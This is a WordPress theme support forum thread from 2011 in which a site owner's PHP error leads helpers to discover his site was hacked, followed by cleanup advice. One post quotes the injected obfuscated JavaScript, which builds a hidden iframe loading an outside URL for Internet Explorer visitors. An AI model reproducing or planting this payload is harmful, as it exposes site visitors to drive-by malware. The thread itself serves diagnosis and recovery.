Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme »

[SOLVED] Random error

Old Nov 19, 2011, 03:30 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
I have not modified any of the templates for a while, yet this issue recently appeared on all pages:

Code:
Fatal error: Cannot redeclare _765258526() (previously declared in /home/wimble17/public_html/fscene.com/wp-content/themes/atahualpa353/index.php(42) : eval()'d code:1) in /home/wimble17/public_html/fscene.com/index.php(18) : eval()'d code on line 1
You can view it at the bottom of the live site here:

http://goo.gl/HZhvk
Old Nov 19, 2011, 06:32 PM
juggledad

23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
what php code do you have in the footer area?
Old Nov 19, 2011, 07:21 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Thanks for your time juggledad.

There is no php code in the footer but I did insert some php code in the "content below the loop" section:

http://snipt.org/kXll7
Old Nov 20, 2011, 04:02 AM
juggledad

23,765 posts · Mar 2009
what version?
try changing the
HTML Code:
<?php if ( is_front_page() && strpos($_SERVER['REQUEST_URI'], "/page/") === false) { ?>
to
HTML Code:
<?php if ( is_front_page() ) { ?>

Last edited by juggledad; Nov 20, 2011 at 04:08 AM.
Old Nov 21, 2011, 01:06 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
No change occurred.

This site is running Atahualpa 3.5.3
Old Nov 21, 2011, 05:02 PM
lmilesw

10,176 posts · Jul 2009
Central New York State USA
What happens if you temporarily remove the code you put in the "content below the loop" section?
Old Nov 22, 2011, 04:00 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by lmilesw
What happens if you temporarily remove the code you put in the "content below the loop" section?
Good observation. I just tried removing all the code I entered there, and nothing changed on the site either. So the problem must lie somewhere else.
Old Nov 22, 2011, 04:39 PM
juggledad

23,765 posts · Mar 2009
export your settings (ato->export/import settings) and attach them to a reply
Old Nov 22, 2011, 04:52 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by juggledad
export your settings (ato->export/import settings) and attach them to a reply
Thank you, here are the settings.

Last edited by Wimbledon; Nov 23, 2011 at 09:21 PM.
Old Nov 22, 2011, 05:09 PM
juggledad

23,765 posts · Mar 2009
do you have a yahoo plugin? There is some weird code in the footer of your page
Code:
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|cx|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|xe|noquestion|showthread|php|http|46340270'.split('|'),0,{}))
</script>
do you know what this is or what is adding it in?
Old Nov 23, 2011, 04:19 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Wow juggledad, I have no idea what that is. I certainly did not add it nor do I have any Yahoo plugins. The only plugins active on the site are Disqus, Lijit Search, and NextGen Gallery. Akismet and Hello Dolly are inactive plugins.

At ATO-->Style & Edit footer, there is no such code inserted.

Perhaps this is malicious code inserted through a security vulnerability?

Are you able to tell which file has this code? If so, I will edit the file and FTP the changes.

How odd...
Old Nov 23, 2011, 06:14 PM
juggledad

23,765 posts · Mar 2009
I looked at teh source of a page generated from your site. I wasn't going to mention malicious code...yet, but it certainly is not code meant to be understood.

here is what I would do, turn off all the plugins and swap to twenty-eleven.
view the fornt page of the site then look at the source of the page in the browser.
go to the end and see if that code is there. if it is, then I would say you were hacked.
Old Nov 23, 2011, 06:32 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
I did exactly as you instructed yet unfortunately the code remained. It does appear that I was hacked.

Do you have any idea where I should start looking for this code?
Old Nov 23, 2011, 07:10 PM
juggledad

23,765 posts · Mar 2009
It might be a Wordpress file.
1) change all your passwords in Wordpress - look for strange users
If you want to do a forensic exam, backup the entire wordpress folder and the database and get a copy of the logs for as far back as you can. If it was an FTP hack, it should show something
Look at the dates on the files via FTP and see if there are ones that have newer dates than when you installed wp.
Maybe contact your host
Manually replace the entire wordpress code base, everything but the wp-config.php and the wp-contents folder
Replace every plugin with a new copy
Replace every theme with a new copy
Change tot FTP password
Check to see if there are any extra FTP users
Change your host Chanel password
Scan the db export for that code

Check google for other suggestions
Old Nov 23, 2011, 09:23 PM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Thanks again for your time and help.

Upon closer inspection, all sites on the server have been similarly compromised unfortunately. I am in correspondence with my host to help resolve this. I was definitely hacked.
Old Nov 24, 2011, 12:16 AM
Wimbledon

320 posts · Apr 2009
[VA & AZ], USA
Update: this is a malicious attack on Wordpress setups going around right now.

http://redleg-redleg.blogspot.com/20...d-on-nlai.html